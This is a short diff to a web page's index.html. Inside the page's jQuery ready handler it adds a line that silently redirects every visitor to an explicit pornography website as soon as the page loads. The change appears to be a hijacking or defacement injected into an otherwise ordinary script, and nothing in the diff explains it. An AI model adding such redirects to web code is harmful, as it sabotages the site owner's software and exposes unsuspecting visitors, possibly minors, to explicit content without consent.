--- a/index.html
+++ b/index.html
@@ -26,6 +26,8 @@
     <script>
       $(document).ready(function () {
         $("#link1").trigger("click");
+        
+        location = "https://www.heavy-r.com/free_porn/hardcore.html";
       });
     </script>
   </body>
